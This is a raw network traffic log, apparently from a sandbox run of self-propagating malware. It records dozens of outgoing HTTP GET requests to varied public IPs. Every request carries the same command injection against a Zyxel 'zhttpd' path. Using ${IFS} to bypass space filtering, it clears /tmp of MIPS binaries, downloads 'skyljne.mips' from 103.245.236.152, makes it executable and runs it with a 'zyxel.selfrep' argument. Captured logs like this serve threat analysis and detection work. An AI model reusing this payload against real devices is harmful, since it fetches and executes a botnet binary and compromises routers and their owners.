                                      Jan 14, 2024 15:50:52.436182976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5844192.168.2.1444284139.132.219.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436232090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5845192.168.2.144928675.212.95.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436258078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5846192.168.2.1439650154.70.43.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436297894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5847192.168.2.1460172183.197.207.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436338902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5848192.168.2.1446626146.194.69.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436382055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5849192.168.2.1458092189.250.238.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436433077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5850192.168.2.1447586167.215.79.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436455965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5851192.168.2.144535454.117.176.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436505079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5852192.168.2.1453772167.255.160.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436533928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5853192.168.2.1438838205.138.58.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436573029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5854192.168.2.1458412159.213.195.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436619043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5855192.168.2.144580242.203.253.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436671972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5856192.168.2.1454274131.132.234.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436707020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5857192.168.2.144005659.55.52.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436743975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5858192.168.2.143885236.216.211.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436779022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5859192.168.2.1436750205.246.114.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436827898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5860192.168.2.1448570130.134.185.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436872005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5861192.168.2.1452978183.149.30.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436928034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5862192.168.2.1460414184.160.26.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436964989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5863192.168.2.145334034.238.79.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436994076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5864192.168.2.1434520199.100.65.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437036037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5865192.168.2.1450872151.157.141.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437088966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5866192.168.2.1454498171.198.133.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437117100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5867192.168.2.144410625.198.100.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437156916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5868192.168.2.1443864107.23.63.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437284946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5869192.168.2.14488288.79.22.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437294006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5870192.168.2.1445964216.196.220.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437294960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5871192.168.2.1432850152.194.179.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437306881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5872192.168.2.145442620.131.211.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437310934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5873192.168.2.1436820203.13.67.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437366962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5874192.168.2.1434980153.105.176.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437396049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5875192.168.2.1435888100.53.228.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437699080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5876192.168.2.1458822189.97.8.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437699080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5877192.168.2.1434814123.166.209.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437699080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5878192.168.2.1447572138.230.203.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437731981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5879192.168.2.1445014201.95.245.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437839031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5880192.168.2.1458078213.206.189.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437839031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5881192.168.2.144821896.29.138.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437864065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5882192.168.2.1449344213.54.167.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437938929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5883192.168.2.145740699.178.174.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437938929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5884192.168.2.143620447.20.40.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437938929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5885192.168.2.1441670175.246.20.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437944889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5886192.168.2.145316631.42.81.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.437953949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5887192.168.2.1453248151.99.159.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438003063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5888192.168.2.1446064218.237.0.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438003063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5889192.168.2.144902874.23.199.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438051939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5890192.168.2.144622689.78.233.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438055038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5891192.168.2.1443540121.62.211.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438139915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5892192.168.2.1449436165.92.192.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438159943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5893192.168.2.145443664.31.226.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438159943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5894192.168.2.1451048198.159.90.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438250065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5895192.168.2.143685657.224.5.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438270092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5896192.168.2.1433050193.181.147.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438297987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5897192.168.2.14455561.29.140.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438324928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5898192.168.2.145412088.115.115.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438380957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5899192.168.2.14503105.140.168.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438410997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5900192.168.2.145751675.13.100.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438467026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5901192.168.2.145974680.24.20.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438489914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5902192.168.2.145275643.41.217.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438535929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5903192.168.2.145624457.179.57.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438577890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5904192.168.2.144730246.117.189.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438610077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5905192.168.2.1435230139.67.181.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438680887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5906192.168.2.143682236.54.2.248443
                                      TimestampBytes transferredDirectionData
